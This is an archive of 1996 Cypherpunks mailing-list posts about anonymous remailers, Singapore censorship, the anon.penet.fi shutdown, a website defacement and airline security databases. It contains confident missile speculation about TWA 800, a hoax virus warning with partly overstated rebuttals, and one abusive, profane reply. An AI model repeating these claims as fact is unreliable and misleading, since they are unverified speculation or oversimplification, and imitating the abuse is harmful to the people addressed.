>>>>>>>bin.  What would account for so little PETN in this case?
>>>>>>
>>>>>>>A proximity fuze detonation of a missile would touch off the blast
>>>>>>>outside
>>>>>>>the aircraft.  Kinetic energy would still send a large portion of it into
>>>>>>>the aircraft, penetrating it and passing through, but most of the
>>>>>>>explosive
>>>>>>>residue would burn away or dissipate outside of the aircraft.  If
>>>>>>>they can
>>>>>>>find fragments of the 747 underbelly and subject them to tests, I
>>>>>>>strongly
>>>>>>>believe they will find higher concentrations of both PETN residue and
>>>>>>>tungsten fragments embedded in the metal.
>>>>>>
>>>>>>>If this was a bomb, it had to be enormously powerful, skillfully
>>>>>>>planted or
>>>>>>>just unfortunately "lucky."  The entire bottom of the plane around the
>>>>>>>center wing box is said to be missing but, bewteen the passenger
>>>>>>>cabin and
>>>>>>>the outer surface of the bottom of the plane is some of the most robust
>>>>>>>construction known to exist on the 747.  How is it, then,  that that the
>>>>>>>"device" was able to blow off the front of the fuselage, blow away
>>>>>>>at least
>>>>>>>the right side of the fuselage, then make it past the heavy-duty
>>>>>>>wings and
>>>>>>>AC unit to shread the bottom of the plane into fragments so small
>>>>>>>they may
>>>>>>>have to dredge to recover them?
>>>>>>
>>>>>>>It seems that only a missile could rip away the bottom exterior upon
>>>>>>>contact
>>>>>>>to blast away the AC unit lying right above that area.  As the hot
>>>>>>>remains
>>>>>>>of the missile body continue into the aircraft, they could tear open the
>>>>>>>center fuel tanks and, with the compression of air and kinetic
>>>>>>>energy, blow
>>>>>>>out the right side and cause separation of the forward fuselage.  The
>>>>>>>thousands of tungsten fragments and the armor-piercing capability of
>>>>>>>the RBS
>>>>>>>70 would surely be capable of such incredible damage.  It has destroyed
>>>>>>>light armored vehicles when fired in the air-to-ground mode, so it
>>>>>>>shouldn't
>>>>>>>be hard to imagine it doing severe damage to the thin skin of a
>>>>>>>pressurized
>>>>>>>airliner hull at 13000+ feet.
>>>>>>
>>>>>>>And there are precedents for using SAMs against airliners and civilian
>>>>planes.
>>>>>>
>>>>>>>In the former Soviet Republic of Georgia, airliners were being used
>>>>>>>to ferry
>>>>>>>out refugees and to bring in weapons and supplies during the civil
>>>>>>>war with
>>>>>>>Abkhazian separatists.  SAM gunners, in boats out on the Black Sea, are
>>>>>>>known to have shot down at LEAST two airliners as they approached
>>>>>>>and took
>>>>>>>off from Sukhumi, Georgia.
>>>>>>
>>>>>>>In April, 1995, a Falcon executive jet carrying the president of
>>>>>>>Rwanda was
>>>>>>>on final approach to Kigali airfield in the capital city of Rwanda
>>>>>>>when it
>>>>>>>was shot down by a shoulder-fired SAM (RBS 70 is NOT shoulder-fired
>>>>>>>but is a
>>>>>>>MANPAD, or man-portable system mounted on a pedestal mount).
>>>>>>
>>>>>>>It has happened before, it may have happened with TWA 800.  Now, what
>>>>>>>measures do we take to make sure it doesn't happen again?
>>>>>>
>>>>>>
>>>>>>>Ron Lewis
>>>>>>>CHIEF MILITARY & AVIATION ANALYST
>>>>>>>THE INTELLIGYST GROUP
>>>>>>
>>>>>>
>>>>>>
>>>>>>>--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENT
>>>>>>>ON***
>>>>>>>Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
>>>>>>>Please, report inappropriate use to                abuse@anon.penet.fi
>>>>>>>For information (incl. non-anon reply) write to    help@anon.penet.fi
>>>>>>>If you have any problems, address them to          admin@anon.penet.fi
>>>>>>
>>>>>>Dr Pepper
>>>>>>10 - 2 - 4
>>>>>
>>>>>
>>>>>Uh, oh!
>>>>>Joop Teernstra
>>>>>http://serve.com/terastra
>>>>>If you want to make up your mind about an argument, see who attacks the
>>>>>person, rather than the matter at hand.
>>>>>
>>>>>
>>>>>* CEBU-L DISCUSSION LIST * Comments/Complaints, write:
>>>>>ADMIN@CEBU.USC.EDU.PH
>>>>>To unsubscribe, write: LISTSERV@CEBU.USC.EDU.PH w/ body text: SIGNOFF
>>>>>CEBU-L
>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>>
>>>
>>>
>>>
>>
>>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 1 Sep 1996 13:12:50 +0800
To: "Michael T. Babcock" <stewarts@ix.netcom.com>
Subject: Re: PGP Comments Considered Occasionally Harmful Re: Pronto making a comment
Message-ID: <19960901031602750.AAA140@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996 01:44:15 -0700, stewarts@ix.netcom.com wrote:

>>> How did you get Pronto to do a comment?
>>I added a "comment=" in my config.txt ;) ... the old fashionned way.
>...
>>-----BEGIN PGP SIGNATURE-----
>>Version: 2.6.3i
>>Charset: ascii
>>Comment: http://www.cyberbeach.net/~mbabcock/PGP/
>
>Note that the comment makes traffic analysis much easier.
>Sure, you can send your mail through five different remailers,
>but if each layer of PGP has your home page URL or some other
>distinctive Comment:, it's traceable.

OTOH, a signature has your distinctive key-id anyway.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 31 Aug 1996 17:15:50 +0800
To: cypherpunks@toad.com
Subject: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <1.5.4.32.19960831063502.0033b25c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 17:55 29/08/96 -0700, Timothy C. May wrote:

>Personally, if this crackdown in Singapore happens, I intend to post
>various anti-Singapore and anti-Lee Kwan Yew & Sons screeds to various
>newsgroups that Singaporans might like to read. Then, if the Yew Dynasty
>decides to pull the plug, it'll be to more and more groups.

There are two sides to this: after all, it is the Singaporeans who finally 
have to sort out this problem with their government, and denying them
the Usenet platform for discussion would only hinder that process.

Then again, inappropriate postings are the bane of the Internet: the consensus 
on which the Net functions relies heavily on people not posting
inappropriately. 
Of course, posting anti LKY stuff on a Singapore newsgroup might be perfectly
appropriate -- it is the "more and more groups" part I am worried about.

I quite frankly disapprove of the mail-bomb suggestions made on
the list. Accessing
the Internet is hard enough without these additional roadblocks.
Mail-bombing one
person on a server punishes everybody else on that server too. We need to work
with the people in Singapore on this, not make enemies of them.

I'm glad that the situation in Singapore is attracting much
attention on this list, and that
people want to do something about it. China is seriously
interested in the experiment, 
and India will be too: the law here holds the ISPs responsible
for ensuring that nothing objectionable and obscene is carried by
them, and what simpler way to comply than to
simply use the Singapore proxy. Right now, the law isn't being
enforced, but soon some
headline-seeking politician will point out this out, and the
problem will be with us. So, 
it is important to nip the Singapore experiment in the bud.
However, I think that  the constructive approach, one which
furthers the Net, "routes around", would work better.

For instance, I'd love to see some smart venture capitalist fund
a project that makes
use of surplus, off-peak bandwidth on a transponder on any of the
myriad satellites 
floating over Asia to download Web pages on request. Ideally, I
should be able to 
send via pgp and anonymous remailer a request for a page, which would soon
come beamed down unencrypted via satellite. No more waiting hours
for the latest 
version of Netscape to download, and then restarting from scratch
every time the line drops. Also, goodbye censorship. Even if the
government decided to cut off
Internet access completely, I'd still be able to receive what others such as Tim
think might be of interest to me.

How would this generate revenue? Well, there could be advertising appended to 
select pages, for instance. In any case, with so much uncertainity about how
commerce on the net will work, and in good Internet tradition a la Netscape,
it would probably be smarter to start with a free service, and figure out later
how to make money from it, once it becomes popular.

In a few years, satellite-based Internet access will become widespread and
affordable. However,  the next few years are  really crucial. Governments are
still trying to figure out how to deal with the Net, frame
legislation, etc. This
would be a good time to present them with a fait accompli. Hong Kong will
revert to China next year. What better gift to the nervous freedom fighters 
there, than to help them with their Internet access? Maybe Hong Kong will
take over China, instead of the other way around...

I remember in Sculley's book "Odyssey: from Pepsi to Apple"  he mentions how
Steve Jobs finally convinced him to join Apple by asking if he wanted to sell 
sugared water for the rest of his life, or would he rather change the world. 
The Internet presents opportunities like that to far more people,
and this, IMHO,
is one of them: any would-be Sculleys out there?

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 31 Aug 1996 17:15:40 +0800
To: jim bell <vipul@pobox.com
Subject: Re: Phoneco vs X-Phone
Message-ID: <1.5.4.32.19960831063510.00348e9c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 17:45 20/08/96 -0800, jim bell wrote:
>
>The fact is, LD phone is a business that, like it or not, is going to shrink 
>drastically _in_terms_of_dollars_, simply because the cost of that service 
>will likewise, go down.  That's life.

Perhaps the answer to this interesting debate between Vipul and Jim lies in
looking at what happened to computers as they became cheaper. There was
a time when someone at IBM predicted that the needs of the entire world would
be met by about 50 computers or so, but now that computers are almost free
(as Jim argues bandwidth has become), we have almost that many in a single
household (counting all the video games, watches, car and
appliance electronics).
People found new ways to use computers, so they used far more of them. So
much so, that the computer industry overall did not shrink, but
grew. There was a
time when you bought "time"  on a computer, as you do in
long-distance telephony. Changing over to computer purchase
didn't kill the industry.

So if you were sold a size of bandwidth pipe instead of how many hours you 
actually use it, and eliminated the cost of accounting for time usage, I think
we'd all be happier -- except maybe the  IBMs of telecom.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 1 Sep 1996 13:31:13 +0800
To: "charlee@netnet.net>
Subject: Re: WARNING vIRuS!
Message-ID: <19960901031602750.AAB140@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996 11:21:05 -0500, kickboxer wrote:

>        There is a new and VERY dangerous virus called the HAZ-MAT virus!
>it fucks up the sectors on your hd, and really messes up the partition
>tables.  It does this once a week, picking a random time to do it.  99.9% of
>virus scanners and other antivirus programs will not recognize it, for it is
>a totally new strain, using a never before seen code.... Be warned!  The
>HAZ-MAT virus usually resides in JPG, and GIF files... once the files are
>viewed, the virus takes effect.
>scan all images upon download!
As soon as you said that, it's obvious it's a hoax.  The first law of computer
viruses: You have to run a program to get one.  JPG and GIF files are *never*
executed.  There is no possible way for you to get a virus from one.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 1 Sep 1996 06:04:56 +0800
To: cypherpunks@toad.com
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <Pine.3.89.9608311202.A7161-0100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


The attached article was reposted to fight-censorship with the permission
of the Los Angeles Times, which ran it on the front page today. 

It's a good story. Compare it to the Reuters dispatch, which yowled about 
child porn but didn't even mention threats from the Church of Scientology:

 >Finn To Close Net Remailer After Child Porn Claim
 >
 >HELSINKI - A Finnish Internet specialist said today he's closing his
 >remailer, or anonymous forwarding system, after rejecting allegations 
 >it was being used as a conduit for child pornography.  [...]

Note Esther Dyson's comments:

         "The damage that can be done by anonymity is far bigger" than in
   any other medium, said Esther Dyson, chairwoman of the Electronic
   Frontier Foundation. "In the end, you need to be able to get at
   somebody's identity to enforce accountability, and the question is how
   do you also enforce freedom of speech and freedom from prosecution for
   unpopular opinions."

Also, on the "Mick Williams Cyberline" radio show I was on this 
afternoon, we heard an unconfirmed report that Helsingius is suing the 
Observer, but I haven't seen it on the wires yet...

-Declan

---

Los Angeles Times
Saturday, August 31, 1996

Internet Figure Pulls Plug   (- 0p9)
on His Anonymity Service   (- 0p6)
 
By AMY HARMON 
TIMES STAFF WRITER Byline ends here.

        Johan Helsingius, an Internet icon who for 3 1/2 years has
   championed anonymous communication over the global computer network by
   running a service that makes it possible, pulled the plug Friday on
   the machine known as anon.penet.fi.
         Civil liberties advocates said the move, prompted by a Finnish
   court decision that the anonymity of the service could be breached by
   court order, raised serious concerns about the future of anonymous
   speech on the rapidly growing network.
         A strong privacy ethic has prevailed on the Internet since its
   early days as a tool for academics and the military. The network was
   largely self-policed, and anonymous services--including
   Helsingius'--explained to users that they were not to be used for
   criminal activity, otherwise they would get shut down.
        
         But the recent explosion of electronic commerce and community
   has raised the stakes. Law enforcement agencies, as well as
   anti-pornography advocates and many others, maintain that total
   anonymity provides too much shelter for a variety of criminal
   activities.
         Based in Helsinki, the Finnish capital, Helsingius' service was
   the biggest of its kind in the world, with more than half a million
   users and with 7,500 messages passing through it each day.
         Frequent users included suicide counseling groups, human rights
   organizations and "anyone who wanted to discuss anything without their
   neighbors and employers looking on," Helsingius said.
         The amorphous structure of the Internet, which ignores
   international boundaries, means that users throughout the world will
   be affected by the shutdown. They will be offered the option of
   revealing their true identities or finding another service--there are
   about 40 others worldwide.
         The idea of an anonymous remailer is to protect the
   confidentiality of its users' identities. When a piece of e-mail was
   sent to anon.penet.fi, its identifying information was stripped off
   and a code number was substituted. The message was then forwarded to
   the individual, mailing list or discussion group for which it was
   intended.
         The only link between the real and assumed identity resided on
   the computer in Helsingius' home.
         More sophisticated remailers use encryption software to create a
   new identity and route messages through a string of several computers
   around the world, never recording the transactions. That way no
   individual operator has a record of the original sender.
         But Helsingius' service was notable because it allowed others to
   respond directly to the sender via the pseudonym on anon.penet. It
   also did not require any special software programs--and it was free.
         *
         In a telephone interview Friday from Helsinki, the 35-year-old
   Finn--known by his e-mail handle, Julf--said he was discouraged by the
   court's interpretation of the communication privacy laws in a case
   that involved a petition from the Church of Scientology, which wants
   Helsingius to reveal the identity of an individual who is alleged to
   have posted its copyrighted material on the Internet through
   Helsingius' remailer.
         "The court made it quite clear that the privacy of electronic
   mail isn't covered in Finland anymore," Helsingius said. "I would be
   running to the courtroom all the time because the suspicion of a
   crime, however minor, would be enough grounds to get a court decision
   to have the sender revealed. What's the point?"
         The Scientologists' petition underlines the heightened
   threat--and potential benefit--of anonymity on the Internet. While
   anonymity is possible via traditional mail or over the telephone, the
   Internet provides far greater reach for far less cost than any other
   medium, and it is technically much harder to eavesdrop upon.
         Helsingius, who has run the remailer in his spare time, has for
   three years been fending off requests from law enforcement authorities
   to discover the identity of his users. He was forced last February to
   provide Finnish authorities with the name of a user who was alleged to
   have broken into the church's computer to steal copyrighted
   information.
         The legal protection for digital anonymity has not yet been
   tested in U.S. courts, but Internet legal experts expect that it will
   be soon. The American Civil Liberties Union of Georgia is currently
   seeking to restrict the application of the new Georgia Computer
   Systems Protection Act, which broadly prohibits the use of pseudonyms
   on the Internet.
         The issue of how to deal with anonymity is a crucial one for
   those trying to establish the medium as a place to work, play and live
   in the coming decades.
         Internet-spawned activists such as the Cypherpunks argue that
   the system will collapse without a guarantee of secure and private
   communication. And advances in cryptography have made that, for the
   most part, technologically possible.
         But other Internet enthusiasts disagree.
         *
         "The damage that can be done by anonymity is far bigger" than in
   any other medium, said Esther Dyson, chairwoman of the Electronic
   Frontier Foundation. "In the end, you need to be able to get at
   somebody's identity to enforce accountability, and the question is how
   do you also enforce freedom of speech and freedom from prosecution for
   unpopular opinions."
         Anonymous services have in fact been used for
   "mail-bombing"--crashing computer systems by overloading them with
   e-mail--and for obscene postings to discussion groups that are
   tantamount to broadcasting obscene phone calls.
         Anti-pornography advocates have also begun to target anonymous
   Internet services, which they blame for enabling the easy distribution
   of illicit material over the network.
         Last week, in a front-page headline, the London weekly newspaper
   the Observer called Helsingius "the Internet middleman who handles 90%
   of all child pornography."
         Helsingius says the sensational article had nothing to do with
   his decision, but he is clearly tired of the situation. Most anonymous
   remailers, included anon.penet.fi, he says, filter out the
   transmission of large image files that are likely to contain
   pornographic pictures.
         "I have personally been a target because of the remailer for
   three years. Unjustified accusations affect both my job and my private
   life," he said.
         After setting up his server so that it can be used on a limited
   basis by certain nonprofit groups, Helsingius plans to set up a task
   force to discuss the practical problems related to ethical and civil
   rights issues on the Internet.
         Meanwhile, many Internet denizens mourned the passing of
   anon.penet on Friday and hailed Helsingius as a "net.hero."
         "This is a sad day in the history of the Net," wrote Declan
   McCullagh, who runs a widely distributed electronic mailing list
   called "fight-censorship." "Hundreds of thousands of people had
   accounts on Julf's pseudonmyous server and many netizens relied on it
   daily to preserve their privacy online."
         "[Helsingius] has done a lot of good work. He's been attacked on
   all sides, and he's hung in there," said Sameer Parekh, founder of
   Community Connexion in Berkeley, which hopes to build a business out
   of providing anonymous remailer services.
         "It's too bad that he had to shut down. But we believe there's a
   demand for anonymity, and use of these systems is only going to
   increase."
   
        BACKGROUND
         Anonymous remailers make it possible to send messages over the
   global Internet computer network without revealing who or where they
   come from. Anyone with an Internet account can contact a remailer
   service and register for an account. Then, when sending electronic
   mail or posting messages to an electronic discussion group, the
   subscriber addresses it to the remailer as well as to the final
   destination. The message travels to the remailer computer, which
   automatically strips off the originating name and address and forwards
   it to the final destination. Some remailers also allow the recipient
   of an anonymous message to respond anonymously, so that the entire
   exchange is "double-blind."
        
   Copyright 1996, Los Angeles Times

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 1 Sep 1996 05:40:27 +0800
To: cypherpunks@toad.com
Subject: Re: WARNING vIRuS!
In-Reply-To: <199608311621.LAA20992@netnet1.netnet.net>
Message-ID: <Pine.3.89.9608311205.A15184-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain



I doubt very seriously that this is anything more than a troll.

First off, the algorythms used to find polymorphics are sophisticated 
enough to detect newly published viruses.

Secondly, DOS/Windows et al. are not much more than boot sector viruses 
themselves. :-) Their structure is well know and there isn't any back 
door available to bang the OS from that hasn't already been exploited.

Real OS's like Unix, OS/2 etc. are also know quantities.

Binary launches are the way they do it, and the way a virus spreads, 
unless you get caught up with autoexecuting Word and Excel macros.

I have yet to see *any* truly data propogating viruses.

None the less, it is always a good idea to keep a scanner handy for 
thoses files that wander in off the Net. You never really know what 
they've been doing and who they've been doing it with. :-)

...Paul

-------------------------------------------------------------------------

"Faced with the choice between changing one's mind and proving that there
 is no need to do so, almost everybody gets busy on the proof"

                                            -- John Kenneth Galbraith

"Success is attending a funeral as a spectator"

                                            -- E. BonAnno 

-------------------------------------------------------------------------

On Sat, 31 Aug 1996, kickboxer wrote:

>         There is a new and VERY dangerous virus called the HAZ-MAT virus!
> it fucks up the sectors on your hd, and really messes up the partition
> tables.  It does this once a week, picking a random time to do it.  99.9% of
> virus scanners and other antivirus programs will not recognize it, for it is
> a totally new strain, using a never before seen code.... Be warned!  The
> HAZ-MAT virus usually resides in JPG, and GIF files... once the files are
> viewed, the virus takes effect.
> scan all images upon download!
>                                                                                
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Sep 1996 03:03:23 +0800
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis is a test, right? [was RE: Desubscribe]
In-Reply-To: <2.2.32.19960830224855.00355560@labg30>
Message-ID: <6DBJTD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


John Deters <jad@dsddhc.com> writes:
> I can't believe it any more.

That's because you're a pathological liar and have no credibility.

<non-crypto-relevant lies and personal attacks, displaying the idiot's
ignorance of SMTP, KKK, Dr. Serdar Argic, et al deleted without reading>
> John (soon-to-be-spit-upon,no-doubt) Deters.

You're not worthy of our spittle, fuckhead.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Erickson" <exl@castles.com>
Date: Sun, 1 Sep 1996 07:02:32 +0800
To: "Dale Thorn" <cypherpunks@toad.com>
Subject: Re: Below-bit-level encoding
Message-ID: <9608312103.AA11724@castles.com>
MIME-Version: 1.0
Content-Type: text/plain


how the hell do i get of this list?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Erickson" <exl@castles.com>
Date: Sun, 1 Sep 1996 06:56:35 +0800
To: <tcmay@got.net>
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <9608312104.AA11740@castles.com>
MIME-Version: 1.0
Content-Type: text/plain


how do i get off this list?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Erickson" <exl@castles.com>
Date: Sun, 1 Sep 1996 07:00:14 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <9608312106.AA11807@castles.com>
MIME-Version: 1.0
Content-Type: text/plain


list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@io.com>
Date: Sun, 1 Sep 1996 05:56:54 +0800
To: Sean Sutherland <maverick@thepentagon.com>
Subject: Re: Local Obscenity Regulations
In-Reply-To: <19960831100811343.AAA184@maverick>
Message-ID: <Pine.BSI.3.95.960831140224.4825A-100000@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Sean Sutherland wrote:

> Seems that Oregon has a ballot up for measure which will allow each city 
> and county to decide for itself what obscenity is.

Initiatives like this keep popping up in Oregon (we had another anti-free
speech initiative in '94) because Oregon's state constitution has been 
interpreted to protect speech more broadly than the US constitution. 
It seems like a robust set of constitutional rights makes some people
nervous, and they respond by asking that those rights be curtailed. (cf
the initiative which limited California's constitutional search & seizure
protections to the federal standard. feh. Oregon will probably face such
an initiative soon, because Oregon's constitutional search & seizure
provisions are significantly more protective than the federal standard.) 

But the good (?) news is that the US constitution acts as a "floor" for
rights; the gentle citizens of Oregon can't restrict their own free speech
rights below the federal standard, no matter how frustrating that is to
Ayatollah Mannix and his ilk. (The notion of "community standards" is
already part of federal free speech jurisprudence; but "community" is not
necessarily coterminous with city or county boundaries.) 

But all of my books are in boxes and I'll be a California resident again 
in ~24 hours. Goodbye, Oregon lunacy. Hello, California lunacy. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: youssefy@ucla.edu
Date: Sun, 1 Sep 1996 07:30:36 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Lite
Message-ID: <2.2.32.19960831214553.006cf514@pop.ben2.ucla.edu>
MIME-Version: 1.0
Content-Type: text/plain


There was a posting by someone about three weeks ago that gave the address
for a person who ran a filtered version of the cypherpunks list, can someone
please repost that information?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Sun, 1 Sep 1996 07:44:02 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <ae4e63ca01021004ac2b@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 PM 8/31/96, Declan McCullagh wrote:
<SNIP>
>Note Esther Dyson's comments:
>
>         "The damage that can be done by anonymity is far bigger" than in
>   any other medium, said Esther Dyson, chairwoman of the Electronic
>   Frontier Foundation. "In the end, you need to be able to get at
>   somebody's identity to enforce accountability, and the question is how
>   do you also enforce freedom of speech and freedom from prosecution for
>   unpopular opinions."
>
<SNIP>

Is this the official EFF position on remailers? This strong anti-remailer
position needs to be retracted or widely publicized.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 1 Sep 1996 07:08:28 +0800
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Moscowchannel.com hack
In-Reply-To: <3.0b11.32.19960831074406.0067aee0@mail.eskimo.com>
Message-ID: <Pine.LNX.3.93.960831151026.1002B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Joel McNamara wrote:

> Not really crypto, but related to the DOJ hack in a way.
> 
> Moscow Channel is a pretty slick, Russian news/commentary page.  Their Web
> site was hacked and altered by someone who didn't seem to like Russians all
> Just a matter of time before some builds a dedicated Satan type tool that
> scans for  HTTP server holes or messed up file permissions to make locating
> potential victims easy.


Write your web site to a CD-ROM and hard-code the base directory into the
webserver.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 1 Sep 1996 05:17:24 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: WashPost report on airline security plan
In-Reply-To: <Pine.SV4.3.91.960831115709.16705A-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.94.960831151506.18155A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Alan Horowitz wrote:

> Any one else see the analysis I saw on newsgroup (forget which) which 
> analyzed the pattern of damage to the aircraft, and came to the conclusion 
> that it had to be a proximity-fused missle.

If so it was most likely radar guided.  These tend to be larger, more
restricted, and harder to come by.

The terrorist angle becomes harder to develop in this case.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Sun, 1 Sep 1996 05:11:36 +0800
To: cypherpunks@toad.com
Subject: gopher://gopher.npr.org...1996/Jul.96/fa.07.31.96
Message-ID: <3.0b11.32.19960831152041.0068b3d8@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


gopher://gopher.npr.org:70/00/NPR_Online/Programs/FreshAir/Fresh_Air_Rundown
s/1996/Jul.96/fa.07.31.96

Washington Post investigative reporter JIM McGEE. He has co-written 
with Brian Duffy the new book "Main Justice: The Men And Women 
Who Enforce The Nation's Criminal Laws And Guard Its Liberties." 
It's published by Simon and Schuster. The book is about the changing 
role of the U.S. Justice Department. As the fears of terrorism increase, 
Congress and the White House are giving the Justice Department 
more investigative powers and a wider jurisdiction which includes
actions in foriegn countries. McGee warns in the book that along with 
the apparent protection this could provide Americans it could also 
erode individual liberties. McGee shared a 1987 Pulitzer Prize for a 
series of stories on the Iran Contra Affair. McGee lives in Virginia. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: morgan@keilin.helsinki.fi (Joel Morgan)
Date: Sun, 1 Sep 1996 00:29:58 +0800
To: cypherpunks@toad.com
Subject: singapore and penet
Message-ID: <199608311221.PAA05193@keilin.helsinki.fi>
MIME-Version: 1.0
Content-Type: text/plain


There is a report in a Helsinki newspaper (Helsingin Sanomat 31 Aug
1996, p A11) that the Singapore government has asked Finland to help
them obtain the name of a person who posted via anon.penet.fi to
usenet.  Apparently the messages in question criticize the strict laws
in Singapore and were signed using the name of the former prime
minister Lee Kwan Yew.

-- 
=====================================================================
Joel.Morgan@Helsinki.FI              http://blues.helsinki.fi/~morgan
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 1 Sep 1996 08:17:33 +0800
To: cypherpunks@toad.com
Subject: "Security risks" vs. "credit risks"
Message-ID: <ae4e076b0102100432c4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



The news that airports/airlines (more on this difference in a bit) may be
establishing a data base of security risks sounds Big Brotherish.

But, how is it so much different from credit risks and credit reporting
data bases? If, for example, private airlines (and the U.S. has only
private airlines, not any "public" or "national" airline) wish to check the
data bases on their customers, is this not quite similar to checking credit
risks and ratings before lending money?

There is great danger, to be sure, especially if one's writings and public
utterances become entries into a "threat data base." But I see nothing
unsurprising in, say, American Airlines expressing more interest in Jim
Bell or Tim May, both of whom have written publically about terrorism and
"soft targets," and both of whom have written about how to make pipe bombs,
than in Marianne Smith, retired school teacher from Peoria.

And there is even more danger--even unconstitutionality--in *government
involvement* in such data bases. It's unclear from what I've seen if this
data base is to be run like the private credit ratings agencies or if it is
to have inputs from the FBI, NSA, Interpol, SDECE, etc.

Remember, private airlines are just that: private. Surely we do not support
laws which limit a private airline from using data it has acquired to
decide whom to pay closer attention to. This is the essence of what
knowledge is.

(So long as none of this is mandatory. If Tim's Pretty Good Airline wishes
to not bother screening customers, this should not be illegal. Nor, to my
mind, should TPGA be exposed to negligence lawsuits, so long as his
policies are clearly spelled out.)

I find the notion that one's speeches and Usenet utterances could "harm
one's security rating" a distasteful idea, but so long as such security
ratings are handled by private players, and used by private players, I see
no illegality.

(Of course, the major credit reporting agencies--TRW Credit, Equifax, and
TransUnion--already collude with the government. They collude to falsify
credit ratings, to create identies and histories that never existed when
they say they did, and to provide government with data bases for various
purposes. Obviously a "TRW Security" function would be at least as corrupt,
maybe more so.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
